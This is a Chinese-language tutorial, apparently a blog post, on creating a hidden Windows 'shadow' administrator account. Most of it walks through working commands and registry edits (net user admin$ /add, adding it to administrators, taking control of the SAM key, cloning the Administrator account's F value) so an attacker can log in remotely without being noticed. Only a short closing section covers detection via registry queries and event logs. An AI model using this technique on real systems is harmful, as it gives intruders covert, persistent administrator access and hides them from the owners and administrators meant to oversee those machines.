目的

黑客想创建一个隐藏的管理员权限账号,这样能随时随地登录还不被人发现。

操作步骤

一、创建隐藏用户及分配管理员权限

1️⃣“开始”➡️ 搜索CMD➡️右击CMD,选择以管理员运行->输入“net user admin$ 11qq``` /add”,回车,成功后会显示“命令成功完成”。

1751714517503-a532a117-7fbc-4d79-a124-ecc9af6cd022

2️⃣使用net user是查看不到隐藏账号,使用net user admin$这发现这个隐藏账号是存在的

1751714810528-8e7be230-8ab8-4bf9-9158-715eef13f5b2

二、把隐藏账号设为管理员组

1️⃣输入net localgroup administrators admin$ /add

1751715015109-36abd26f-fc4c-455e-904c-705038485c83

2️⃣此时隐藏账号admin$虽然在CMD里面用net user查看不到,但查看用户和组的时候还是可以发现,所以还需要修改注册表来进行隐藏账号。

1751715101871-55b7e0f2-70f3-488e-882c-57820d35b29c

三、修改注册表进行账号隐藏和克隆管理员权限

1️⃣添加查看注册表中账号权限

在regedt32.exe中来到“HKEY_LOCAL_MACHINE\SAM\SAM”处,点击右键➡️“权限”,在弹出的“SAM的权限”编辑窗口中选中“administrators”账户,在下方的权限设置处勾选“完全控制”,完成后点击“确定”即可。

1751717498926-2fa2bd77-e271-4f1f-9295-92cfccf5b724

2️⃣关掉注册表,重新注册表,点击“开始”→“运行”,输入“regedt.exe”后回车,net localgroup SYSTEM admin$ /add

1751717582671-33d7ff8a-94bc-4a26-8c66-c56a61b1d859

3️⃣导出并编辑注册表项

进入注册表项HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names可以看到系统所有账号也包括隐藏账号admin$。点击账号名可在右边看到账号类型,admin$类型是“3ed”,而administraor的类型是“1f4”

1751717671945-b8fafd89-1f84-46a0-a8a9-c3ab17772230 1751717684071-e3f2695f-df25-4a5f-842d-34fc64694940

4️⃣将admin$导出为admin.reg;把3ed导出为admin3ed.reg;把1F4导出为admin1f4.reg。编辑admin1f4.reg,将它里面属于’F’的内容分复制下来,替换admin3eb.reg里面F的值。

1751717749620-80b0173e-8283-4ad7-bc45-51c5f578b608

5️⃣做完这一步后,去命令提示符里面执行,net user admin$ /del,删除这个账号,然后将admin.reg和admin3eb.reg双击导入注册表,然后我们再回到注册表把之前改的权限全部取消掉,至此隐藏管理员影子账号就完成了。

1751717819073-ec1c1209-efbd-4d2f-ac2f-d0becc6b2f42

⚠️ 去计算机管理成员组里面也是找不到这个账号的。当然重启还是会出现。有些服务器长期不重启,所以能隐藏很久。

四、远程登录隐藏账号

使用隐藏账号admin$远程登录,登录后发现查询自己却还是administrator,但登录的确实admin$,这就是克隆了administrator账号并进行隐藏的效果。

whoami #我是谁

query user #当前登录的账号

五、如何找出隐藏账号

方法1:查看注册表中系统账号:

reg query HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names

1751718101675-1aedf92f-4512-4397-8d37-28dda6fe2868

方法2:查看系统日志:

通过“计算机管理”中的“事件查看器”可以查看到隐藏账户以及其登陆的时间。即使黑客将所有的登陆日志删除,也还会记录是哪个账户删除了系统日志,这样黑客的隐藏账户就暴露无疑了。

1751718137055-70dc8a77-035a-455b-9183-3337491c3532